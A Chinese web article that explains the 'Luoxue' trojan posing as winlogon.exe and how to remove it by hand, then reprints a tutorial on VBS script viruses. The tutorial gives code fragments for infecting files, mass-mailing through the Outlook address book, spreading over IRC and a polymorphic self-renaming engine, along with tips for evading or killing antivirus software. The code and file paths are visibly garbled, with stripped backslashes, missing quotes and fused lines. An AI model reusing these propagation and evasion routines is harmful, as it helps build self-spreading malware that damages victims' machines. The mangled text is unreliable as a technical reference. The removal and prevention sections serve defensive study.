winlogon.exe病毒介绍以及清楚查杀方法

winlogon.exe正常进程信息：

进程文件： winlogon or winlogon.exe

进程名称： Microsoft Windows Logon Process

描述：

WinLogon.exe是Windows NT登陆管理器。它用于处理你系统的登陆和登陆过程。该进程在你系统的作用是非常重要的。

出品者： Microsoft Corp.

属于： Microsoft Windows Operating System

系统进程： 是

后台程序： 是

使用网络： 否

硬件相关： 否

常见错误： 未知N/A

内存使用： 未知N/A

安全等级 (0-5): 0

间谍软件： 否

Adware: 否

病毒： 否

木马： 否

感染后的winlogon.exe病毒进程：

winlogon.exe也可能是W32.Netsky.D@mm蠕虫病毒。该病毒通过Email邮件传播，当你打开病毒发送的附件时，即会被感染。该病毒会创建SMTP引擎在受害者的计算机上，群发邮件进行传播。该病毒允许攻击者访问你的计算机，窃取密码和个人数据。该进程的安全等级是建议删除。

如果你发现你的系统程序里面有一个大写的WINLOGON.EXE，一个小写winlogon.exe，那么恭喜你，你中了“落雪”病毒.大写的 WINLOGON.EXE就是病毒文件,“落雪”木马也叫“游戏大盗”(Trojan/PSW.GamePass），由VB程序语言编写，通过 nSPack3.1加壳处理（即通常所说的“北斗壳”NorthStar），该木马文件图标一般是红色的图案，伪装成网络游戏的登陆器。

winlogon.exe病毒感染情况分析：

落雪病毒运行后，在C盘programfile以及windows目录下生成

    C:windowswinlogon.exe

    C:WINDOWS.com

    C:WINDOWSExERoute.exe

    C:WINDOWSiexplore.com

    C:WINDOWSfinder.com

    C:WINDOWSsystem32command.pif

    C:Windowssystem32command.com

    C:WINDOWSsystem32dxdiag.com

    C:WINDOWSsystem32finder.com

    C:WINDOWSsystem32MSCONFIG.COM

    C:WINDOWSsystem32regedit.com

    C:WINDOWSsystem32rundll32.com

    C:WindowsWINLOGON.EXE

    C:WINDOWSservices.exe

    C:WINDOWSDebugDebugProgramme.exe

等多个病毒文件，病毒文件之多比较少见，，事实上这14个不同文件名的病毒文件系同一种文件，“落雪”之名亦可能由此而来。病毒文件名被模拟成正常的系统工具名称，但是文件扩展名变成了.com。这是病毒利用了Windows *** 作系统 执行.com文件的优先级比EXE文件高的特性，这样，当用户调用系统配置文件Msconfig.exe的时候，一般习惯上输入Msconfig，而这是执行的并不是微软的Msconfig.exe程序，而是病毒文件 Msconfig.com，落雪病毒作者的“良苦用心”由此可见。病毒另一狡诈之处还有，病毒还创建一名为winlogon.exe的进程，并把 winlogon.exe的路径指向c:windowsWINLOGON.EXE，而正常的系统进程路径是 C:WINDOWSsystem32winlogon.exe，以此达到迷惑用户的目的。

除了在C盘下生成很多病毒文件外，病毒还修改注册表文件关联，每当用户点击html文件时，都会运行病毒。此外，病毒还在其他盘下生成一个 autorun.inf和一个pagefile.com的文件自动运行批处理文件，这样即使C盘目录下的病毒文件被清除，当用户打开D盘时，病毒仍然被激活运行。这也是许多用户反映病毒屡杀不绝的原因。

winlogon.exe病毒手动查杀方案：

WINLOGON.EXE病毒，近来在网络很流行，许多朋友都中了，许多杀毒软件能查到，但是无论如何都无法清除。

不知道什么原因，这个病毒的中文译名叫做“落雪”，又叫“飘雪”，很美吧？

我检查了一下，发现进程里多出一个大写的WINLOGON，是在winnt或windows目录下的，而正常情况下，这个进程应该是在winnt或 windows/system32目录下的，此进程不言而知。注册表下的启动项，里面有个Torjan pragramme的启动项目，不能彻底删除。

以下是删除的 方法 ：

这个进程WINLOGON.EXE的用户名是用户自己，因此不可能是正常的系统进程，正常的winlogon系统进程，其用户名为“SYSTEM” 程序名为小写winlogon.exe。而伪装成该进程的木马程序其用户名为当前系统用户名，且程序名为大写的WINLOGON.exe。进程查看方式 ctrl+alt+del 然后选择进程。正常情况下有且只有一个winlogon.exe进程，其用户名为“SYSTEM”。如果出现了两个winlogon.exe，且其中一个为大写，用户名为当前系统用户的话，表明可能存在木马。

这个木马非常厉害，能破坏掉木马克星等许多著名的杀毒软件，使其不能正常运行，就算能正常运行，也会错误杀毒或查毒。目前使用其他杀毒软件未能杀死。但是很明显，人工也可以看出，那个WINDOWS下的WINLOGON.EXE确实是病毒，但是，她不过是这个病毒中的小角色而已，大家用鼠标右键【打开】，打开D盘看看是否有一个pagefile的DOS指向文件和一个autorun.inf文件了，这些当然都是隐藏的，删这几个没用的，因为她关联了很多东西，甚至在安全模式都不能删死，只要运行任何程序，或者双击打开D盘，她就会重新被安装了。而且这段时间很多人的帐号被盗就是因为这个解除的传家宝了。

我分析了一下这个木马的资料，连接是通向河南和天津的某一地区，看来是国内的。而且她很有趣，如果你机子上有传奇等游戏，必然惹来她的亲吻，那么说QQ之类的帐号密码会不会被泄漏，这个不清楚，但起码我有些朋友已经被盗了。

解决“落雪”病毒的方法

症状：D盘双击打不开，而且里面有autorun.inf和pagefile.com文件

此病毒的制作者很了解系统的运作，因此此两个文件难以删除，在安全模式用Administrator一样解决不了！经过一个下午的奋战才算勉强解决。 我没用什么查杀木马的软件，全是手动一个一个把它揪出来把他删掉的。它所关联的文件如下，绝大多数文件都是显示为系统文件和隐藏的。 所以要在文件夹选项里打开显示隐藏文件。

D盘里就两个，搞得你无法双击打开D盘。C盘很多相关文件程序

D:autorun.inf

D:pagefile.com

C:Program FilesInternet Exploreriexplore.com

C:Program FilesCommon Filesiexplore.com

C:WINDOWS.com

C:WINDOWSiexplore.com

C:WINDOWSfinder.com

C:WINDOWSExeroud.exe（传奇的图标，很漂亮）

C:WINDOWSDebug*** Programme.exe（也是上面那个图标，名字每台机子都不同，但是明显是非隐藏的）

C:Windowssystem32command.com 这个不要轻易删，看看是不是和下面几个日期不一样而和其他文件日期一样，如果和其他文件大部分系统文件日期一样就不能删，当然系统文件肯定不是这段时间的。

C:Windowssystem32msconfig.com

C:Windowssystem32regedit.com

C:Windowssystem32dxdiag.com

C:Windowssystem32rundll32.com

C:Windowssystem32finder.com

C:Windowssystem32a.exe

值得注意的是：看看这些文件的日期，看看其他地方还有没有相同时间的文件还是.COM结尾的可疑文件，小心不要运行任何程序，要不就又启动了，包括双击磁盘，还有一个头号文件！WINLOGON.EXE！做了这么多工作目的就是要离开她的亲吻！

C:WindowsWINLOGON.EXE

这个在进程里明显可以看得到，有两个，一个是真的，一个是假的。

真的是小写winlogon.exe，（不知你们的是不是），用户名是SYSTEM，

而假的是大写的WINLOGON.EXE，用户名是你自己的用户名。

这个文件在进程里是中止不了的，说是关键进程无法中止，搞得跟真的一样！就连在安全模式下它都会

呆在你的进程里！ 我现在所知道的就这些，要是不放心，就最好看一下其中一个文件的修改日期，然后用“搜索”搜这天修改过的文件，相同时间的肯定会出来一大堆的， 连系统还原夹里都有！！ 这些文件会自己关联的，要是你删了一部分，不小心运行了一个，或在开始－运行里运行msocnfig，command，regedit这些命令，所有的这些文件全会自己补充回来！

知道了这些文件，首先关闭可以关闭的所有程序，打开程序附件里头的WINDOWS资源管理器，并在上面的工具里头的文件夹选项里头的查看里设置显示所有文件和文件假，取消隐藏受保护 *** 作系统文件，然后打开开始菜单的运行，输入命令 regedit，进注册表，到

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun

里面，有一个Torjan pragramme，这个明摆着“我是木马”，删！！

然后注销！ 重新进入系统后，打开“任务管理器”，看看有没rundll32，有的话先中止了，不知这个是真还是假，小心为好。 到D盘（注意不要双击进入！否则又会激活这个病毒）右键，选【打开】，把autorun.inf和pagefile.com删掉，

然后再到C盘把上面所列出来的文件都删掉！中途注意不要双击到其中一个文件，否则所有步骤都要重新来过！ 然后再注销。

我在奋战过程中，把那些文件删掉后，所有的exe文件全都打不开了，运行cmd也不行。

打开我的电脑点工具==>文件夹选项==>文件类型==>新建exe扩展名，点高级选应用程序。

即可运行

但我在弄完这些之后，在开机的进入用户时会有些慢，并会跳出一个警告框，说文件"1"找不到。（应该是Windows下的1.com文件。）,最后用System Repair Engineer看情况 修理 一下系统的启动项、系统关联等。

最后说一下怎么解决开机提示找不到文件“1.com”的方法：

在运行程序中运行“regedit”，打开注册表，在[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]中

把"Shell"="Explorer.exe 1"恢复为"Shell"="Explorer.exe" 当然这也是启动项罢了。

杀毒软件查杀winlogon.exe病毒方法：

请更新你的杀毒软件病毒库到最新版本进行查杀

可以利用杀毒软件的自定义杀毒进行扫描，检查是否带有病毒。

*** 作步骤：

下载安装一款杀毒软件，比如：百度杀毒，金山毒霸，360杀毒等等；

打开杀毒软件，选择“自定义杀毒”

选择要检查的EXE文件并确定即可自动进行扫描，如有病毒会有提示，并且按照提示进行处理即可。

1．vbs脚本病毒如何感染、搜索文件

VBS脚本病毒一般是直接通过自我复制来感染文件的，病毒中的绝大部分代码都可以直接附加在其他同类程序的中间，譬如新欢乐时光病毒可以将自己的代码附加在.htm文件的尾部，并在顶部加入一条调用病毒代码的语句，而宏病毒则是直接生成一个文件的副本，将病毒代码拷入其中，并以原文件名作为病毒文件名的前缀，vbs作为后缀。下面我们通过宏病毒的部分代码具体分析一下这类病毒的感染和搜索原理：

以下是文件感染的部分关键代码：

Set fso=createobject(scripting.filesystemobject)

'创建一个文件系统对象

set self=fso.opentextfile(wscript.scriptfullname,1)

'读打开当前文件（即病毒本身）

vbscopy=self.readall

' 读取病毒全部代码到字符串变量vbscopy……

set ap=fso.opentextfile(目标文件.path,2,true)

' 写打开目标文件，准备写入病毒代码

ap.write vbscopy ' 将病毒代码覆盖目标文件

ap.close

set cop=fso.getfile(目标文件.path) '得到目标文件路径

cop.copy(目标文件.path &.vbs)

' 创建另外一个病毒文件（以.vbs为后缀）

目标文件.delete(true)

'删除目标文件

上面描述了病毒文件是如何感染正常文件的：首先将病毒自身代码赋给字符串变量vbscopy，然后将这个字符串覆盖写到目标文件，并创建一个以目标文件名为文件名前缀、vbs为后缀的文件副本，最后删除目标文件。

下面我们具体分析一下文件搜索代码：

'该函数主要用来寻找满足条件的文件，并生成对应文件的一个病毒副本

sub scan(folder_) 'scan函数定义，

on error resume next '如果出现错误，直接跳过，防止d出错误窗口

set folder_=fso.getfolder(folder_)

set files=folder_.files ' 当前目录的所有文件集合

for each file in filesext=fso.GetExtensionName(file)

'获取文件后缀

ext=lcase(ext) '后缀名转换成小写字母

if ext=mp5 then '如果后缀名是mp5，则进行感染。

请自己建立相应后缀名的文件，最好是非正常后缀名 ，以免破坏正常程序。

Wscript.echo (file)

end ifnextset subfolders=folder_.subfoldersfor each subfolder in subfolders '搜索其他目录；递归调用

scan( ) scan(subfolder)

next

end sub

上面的代码就是VBS脚本病毒进行文件搜索的代码分析。搜索部分scan( )函数做得比较短小精悍，非常巧妙，采用了一个递归的算法遍历整个分区的目录和文件。

2．vbs脚本病毒通过网络传播的几种方式及代码分析

VBS脚本病毒之所以传播范围广，主要依赖于它的网络传播功能，一般来说，VBS脚本病毒采用如下几种方式进行传播：

1）通过Email附件传播

这是一种用的非常普遍的传播方式，病毒可以通过各种方法拿到合法的Email地址，最常见的就是直接取outlook地址簿中的邮件地址，也可以通过程序在用户文档（譬如htm文件）中搜索Email地址。

下面我们具体分析一下VBS脚本病毒是如何做到这一点的：

Function mailBroadcast()

on error resume next

wscript.echo

Set outlookApp = CreateObject(Outlook.Application)

//创建一个OUTLOOK应用的对象

If outlookApp= Outlook Then

Set mapiObj=outlookApp.GetNameSpace(MAPI)

//获取MAPI的名字空间

Set addrList= mapiObj.AddressLists

//获取地址表的个数

For Each addr In addrList

If addr.AddressEntries.Count <>0 Then

addrEntCount = addr.AddressEntries.Count

//获取每个地址表的Email记录数

For addrEntIndex= 1 To addrEntCount

//遍历地址表的Email地址

Set item = outlookApp.CreateItem(0)

//获取一个邮件对象实例

Set addrEnt = addr.AddressEntries(addrEntIndex)

//获取具体Email地址

= addrEnt.Address

//填入收信人地址

item.Subject = 病毒传播实验

//写入邮件标题

item.Body = 这里是病毒邮件传播测试，收到此信请不要慌张！

//写入文件内容

Set attachMents=item.Attachments //定义邮件附件

attachMents.Add fileSysObj.GetSpecialFolder(0)&\test.jpg.vbs

item.DeleteAfterSubmit = True

//信件提交后自动删除

Then

item.Send

//发送邮件

shellObj.regwrite HKCU\software\Mailtest\mailed, 1

//病毒标记，以免重复感染

End If

NextEnd IfNext

End if

End Function

2）通过局域网共享传播

局域网共享传播也是一种非常普遍并且有效的网络传播方式。一般来说，为了局域网内交流方便，一定存在不少共享目录，并且具有可写权限，譬如win2000创建共享时，默认就是具有可写权限。这样病毒通过搜索这些共享目录，就可以将病毒代码传播到这些目录之中。

在VBS中，有一个对象可以实现网上邻居共享文件夹的搜索与文件 *** 作。我们利用该对象就可以达到传播的目的。

welcome_msg = 网络连接搜索测试

Set WSHNetwork = WScript.CreateObject(WScript.Network)

’创建一个网络对象

Set oPrinters = WshNetwork.EnumPrinterConnections

’创建一个网络打印机连接列表

WScript.Echo Network printer mappings:

For i = 0 to oPrinters.Count - 1Step2

’显示网络打印机连接情况

WScript.Echo Port &oPrinters.Item(i)

& = &oPrinters.Item(i+1)

Next

Set colDrives = WSHNetwork.EnumNetworkDrives

’创建一个网络共享连接列表

If colDrives.Count = 0 Then

MsgBox 没有可列出的驱动器。,

vbInformation + vbOkOnly,welcome_msg

Else

strMsg = 当前网络驱动器连接: &CRLF

Fori=0To colDrives.Count - 1 Step 2

strMsg = strMsg &Chr(13)&Chr(10)&colDrives(i)

&Chr(9)&colDrives(i+1)

Next

MsgBox strMsg, vbInformation + vbOkOnly,

welcome_msg’显示当前网络驱动器连接

End If

上面是一个用来寻找当前打印机连接和网络共享连接并将它们显示出来的完整脚本程序。在知道了共享连接之后，我们就可以直接向目标驱动器读写文件了。

3）通过感染htm、asp、jsp、php等网页文件传播

如今，WWW服务已经变得非常普遍，病毒通过感染htm等文件，势必会导致所有访问过该网页的用户机器感染病毒。

病毒之所以能够在htm文件中发挥强大功能，采用了和绝大部分网页恶意代码相同的原理。基本上，它们采用了相同的代码，不过也可以采用其它代码，这段代码是病毒FSO,WSH等对象能够在网页中运行的关键。在注册表HKEY_CLASSES_ROOT\CLSID\下我们可以找到这么一个主键，注册表中对它他的说明是“Windows Script Host Shell Object”，同样，我们也可以找到，注册表对它的说明是“FileSystem Object”，一般先要对COM进行初始化，在获取相应的组件对象之后，病毒便可正确地使用FSO、WSH两个对象，调用它们的强大功能。代码如下所示：

Set Apple0bject = document.applets(KJ_guest)Apple0bject.setCLSID()Apple0bject.createInstance() ’创建一个实例

Set WsShell Apple0bject.Get0bject()

Apple0bject.setCLSID()

Apple0bject.createInstance()

’创建一个实例

Set FSO = Apple0bject.Get0bject()

对于其他类型文件，这里不再一一分析。

4）通过IRC聊天通道传播

病毒通过IRC传播一般来说采用以下代码（以MIRC为例）

Dim mirc

set fso=CreateObject(Scripting.FileSystemObject)

set mirc=fso.CreateTextFile(C:\mirc\script.ini)

’创建文件script.ini

fso.CopyFile Wscript.ScriptFullName, C:\mirc\attachment.vbs,

True ’将病毒文件备份到attachment.vbs

mirc.WriteLine [script]

mirc.WriteLine n0=on 1:join:*.*:

{if($nick !=$me) /dcc send $nick C:\mirc\attachment.vbs }

'利用命令/ddc send $nick attachment.vbs给通道中的其他用户传送病毒文件

mirc.Close

以上代码用来往Script.ini文件中写入一行代码，实际中还会写入很多其他代码。Script.ini中存放着用来控制IRC会话的命令，这个文件里面的命令是可以自动执行的。譬如，TUNE.VBS病毒就会修改c:\mirc\script.ini 和 c:\mirc\mirc.ini，使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。同样，如果Pirch98已安装在目标计算机的c:\pirch98目录下，病毒就会修改c:\pirch98\events.ini和c:\pirch98\pirch98.ini，使每当IRC用户使用被感染的通道时都会收到一份经由DDC发送的TUNE.VBS。

另外病毒也可以通过现在广泛流行的KaZaA进行传播。病毒将病毒文件拷贝到KaZaA的默认共享目录中，这样，当其他用户访问这台机器时，就有可能下载该病毒文件并执行。这种传播方法可能会随着KaZaA这种点对点共享工具的流行而发生作用。

还有一些其他的传播方法，我们这里不再一一列举。

3．VBS脚本病毒如何获得控制权

如何获取控制权？这一个是一个比较有趣的话题，而VBS脚本病毒似乎将这个话题发挥的淋漓尽致。笔者在这里列出几种典型的方法：

1）修改注册表项

windows在启动的时候，会自动加载HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run项下的各键值所执向的程序。脚本病毒可以在此项下加入一个键值指向病毒程序，这样就可以保证每次机器启动的时候拿到控制权。vbs修改注册表的方法比较简单，直接调用下面语句即可。 wsh.RegWrite(strName, anyvalue [,strType])

2）通过映射文件执行方式

譬如，我们新欢乐时光将dll的执行方式修改为wscript.exe。甚至可以将exe文件的映射指向病毒代码。

3）欺骗用户，让用户自己执行

这种方式其实和用户的心理有关。譬如，病毒在发送附件时，采用双后缀的文件名，由于默认情况下，后缀并不显示，举个例子，文件名为beauty.jpg.vbs的vbs程序显示为beauty.jpg，这时用户往往会把它当成一张图片去点击。同样，对于用户自己磁盘中的文件，病毒在感染它们的时候，将原有文件的文件名作为前缀，vbs作为后缀产生一个病毒文件，并删除原来文件，这样，用户就有可能将这个vbs文件看作自己原来的文件运行。

4）desktop.ini和folder.htt互相配合

这两个文件可以用来配置活动桌面，也可以用来自定义文件夹。如果用户的目录中含有这两个文件，当用户进入该目录时，就会触发folder.htt中的病毒代码。这是新欢乐时光病毒采用的一种比较有效的获取控制权的方法。并且利用folder.htt，还可能触发exe文件，这也可能成为病毒得到控制权的一种有效方法！

病毒获得控制权的方法还有很多，这方面作者发挥的余地也比较大。

4．vbs脚本病毒对抗反病毒软件的几种技巧

病毒要生存，对抗反病毒软件的能力也是必需的。一般来说，VBS脚本病毒采用如下几种对抗反病毒软件的方法：

1）自加密

譬如，新欢乐时光病毒，它可以随机选取密钥对自己的部分代码进行加密变换，使得每次感染的病毒代码都不一样，达到了多态的效果。这给传统的特征值查毒法带来了一些困难。病毒也还可以进一步的采用变形技术，使得每次感染后的加密病毒的解密后的代码都不一样。

下面看一个简单的vbs脚本变形引擎(来自flyshadow)

Randomize

Set Of = CreateObject(Scripting.FileSystemObject)

’创建文件系统对象

vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall

’读取自身代码

fS=Array(Of, vC, fS, fSC)

’定义一个即将被替换字符的数组

For fSC = 0 To 3

vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65))

&Chr((Int(Rnd * 22) + 65)) &Chr((Int(Rnd * 22) + 65))

&Chr((Int(Rnd * 22) + 65)))

’取4个随机字符替换数组fS中的字符串

Next

Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC ’将替换后的代码写回文件

上面这段代码使得该VBS文件在每次运行后，其Of，vC，fS，fSC四字符串都会用随机字符串来代替，这在很大程度上可以防止反病毒软件用特征值查毒法将其查出。

2）巧妙运用Execute函数

用过VBS程序的朋友是否会觉得奇怪：当一个正常程序中用到了FileSystemObject对象的时候，有些反病毒软件会在对这个程序进行扫描的时候报告说此Vbs文件的风险为高，但是有些VBS脚本病毒同样采用了FileSystemObject对象，为什么却又没有任何警告呢？原因很简单，就是因为这些病毒巧妙的运用了Execute方法。有些杀毒软件检测VBS病毒时，会检查程序中是否声明使用了FileSystemObject对象，如果采用了，这会发出报警。如果病毒将这段声明代码转化为字符串，然后通过Execute(String)函数执行，就可以躲避某些反病毒软件。

3）改变某些对象的声明方法

譬如fso=createobject(scripting.filesystemobject)，我们将其改变为

fso=createobject(script+ing.filesyste+mobject)，这样反病毒软件对其进行静态扫描时就不会发现filesystemobject对象。

4）直接关闭反病毒软件

VBS脚本功能强大，它可以直接在搜索用户进程然后对进程名进行比较，如果发现是反病毒软件的进程就直接关闭，并对它的某些关键程序进行删除。

5．Vbs病毒生产机的原理介绍

所谓病毒生产机就是指可以直接根据用户的选择产生病毒源代码的软件。在很多人看来这或许不可思议，其实对脚本病毒而言它的实现非常简单。

脚本语言是解释执行的、不需要编译，程序中不需要什么校验和定位，每条语句之间分隔得比较清楚。这样，先将病毒功能做成很多单独的模块，在用户做出病毒功能选择后，生产机只需要将相应的功能模块拼凑起来，最后再作相应的代码替换和优化即可。由于篇幅关系和其他原因，这里不作详细介绍。

三、如何防范vbs脚本病毒

1．如何从样本中提取（加密）脚本病毒

对于没有加密的脚本病毒，我们可以直接从病毒样本中找出来，现在介绍一下如何从病毒样本中提取加密VBS脚本病毒，这里我们以新欢乐时光为例。

用JediEdit打开folder.htt。我们发现这个文件总共才93行，第一行，几行注释后，以开始，节尾。相信每个人都知道这是个什么类型的文件吧！

第87行到91行，是如下语句：

87：

第87和91行不用解释了，第88行是一个字符串的赋值，很明显这是被加密过的病毒代码。看看89行最后的一段代码ThisText = ThisText &TempChar，再加上下面那一行，我们肯定能够猜到ThisText里面放的是病毒解密代码（熟悉vbs的兄弟当然也可以分析一下这段解密代码，too simple!就算完全不看代码也应该可以看得出来的)。第90行是执行刚才ThisText中的那段代码（经过解密处理后的代码）。

那么，下一步该怎么做呢？很简单，我们只要在病毒代码解密之后，将ThisText的内容输出到一个文本文件就可以解决了。由于上面几行是vbscript,于是我创建了如下一个.txt文件：

首先，copy第88、89两行到刚才建立的.txt文件，当然如果你愿意看看新欢乐时光的执行效果，你也可以在最后输入第90行。然后在下面一行输入创建文件和将ThisText写入文件vbs代码，整个文件如下所示：

ExeString = Afi...’ 第88行代码

Execute(Dim KeyAr... ’ 第89行代码

set fso=createobject(scripting.filesystemobject)

’ 创建一个文件系统对象

set virusfile=fso.createtextfile(resource.log,true)

’ 创建一个新文件resource.log，

用以存放解密后的病毒代码 virusfile.writeline(ThisText)

’ 将解密后的代码写入resource.log

OK！就这么简单，保存文件，将该文件后缀名.txt改为.vbs(.vbe也可以)，双击，你会发现该文件目录下多了一个文件resource.log，打开这个文件，怎么样？是不是“新欢乐时光”的源代码啊！

2．vbs脚本病毒的弱点

vbs脚本病毒由于其编写语言为脚本，因而它不会像PE文件那样方便灵活，它的运行是需要条件的（不过这种条件默认情况下就具备了）。笔者认为，VBS脚本病毒具有如下弱点：

1）绝大部分VBS脚本病毒运行的时候需要用到一个对象：FileSystemObject

2）VBScript代码是通过Windows Script Host来解释执行的。

3）VBS脚本病毒的运行需要其关联程序Wscript.exe的支持。

4）通过网页传播的病毒需要ActiveX的支持

5）通过Email传播的病毒需要OE的自动发送邮件功能支持，但是绝大部分病毒都是以Email为主要传播方式的。

3．如何预防和解除vbs脚本病毒

针对以上提到的VBS脚本病毒的弱点，笔者提出如下集中防范措施：

1）禁用文件系统对象FileSystemObject

方法：用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。其中regsvr32是Windows\System下的可执行文件。或者直接查找scrrun.dll文件删除或者改名。

还有一种方法就是在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键的项，咔嚓即可。

2）卸载Windows Scripting Host

在Windows 98中（NT 4.0以上同理），打开[控制面板]→[添加/删除程序]→[Windows安装程序]→[附件]，取消“Windows Scripting Host”一项。

和上面的方法一样，在注册表中HKEY_CLASSES_ROOT\CLSID\下找到一个主键的项，咔嚓。

3）删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射

点击[我的电脑]→[查看]→[文件夹选项]→[文件类型]，然后删除VBS、VBE、JS、JSE文件后缀名与应用程序的映射。

4）在Windows目录中，找到WScript.exe，更改名称或者删除，如果你觉得以后有机会用到的话，最好更改名称好了，当然以后也可以重新装上。

5）要彻底防治VBS网络蠕虫病毒，还需设置一下你的浏览器。我们首先打开浏览器，单击菜单栏里“Internet 选项”安全选项卡里的[自定义级别]按钮。把“ActiveX控件及插件”的一切设为禁用，这样就不怕了。呵呵，譬如新欢乐时光的那个ActiveX组件如果不能运行，网络传播这项功能就玩完了。

6）禁止OE的自动收发邮件功能

7）由于蠕虫病毒大多利用文件扩展名作文章，所以要防范它就不要隐藏系统中已知文件类型的扩展名。Windows默认的是“隐藏已知文件类型的扩展名称”，将其修改为显示所有文件类型的扩展名称。

8）将系统的网络连接的安全级别设置至少为“中等”，它可以在一定程度上预防某些有害的Java程序或者某些ActiveX组件对计算机的侵害。

9）呵呵，最后一项不说大家也应该知道了，杀毒软件确实很必要，尽管有些杀毒软件挺让广大用户失望，不过，选择是双方的哦。在这个病毒横飞的网络，如果您的机器没有装上杀毒软件我觉得确实挺不可思议的。

四、对所有脚本类病毒发展的展望

随着网络的飞速发展，网络蠕虫病毒开始流行，而VBS脚本蠕虫则更加突出，不仅数量多，而且威力大。由于利用脚本编写病毒比较简单，除了将继续流行目前的VBS脚本病毒外，将会逐渐出现更多的其它脚本类病毒，譬如PHP，JS，Perl病毒等。但是脚本并不是真正病毒技术爱好者编写病毒的最佳工具，并且脚本病毒解除起来比较容易、相对容易防范。笔者认为，脚本病毒仍将继续流行，但是能够具有像宏病毒、新欢乐时光那样大影响的脚本蠕虫病毒只是少数。

---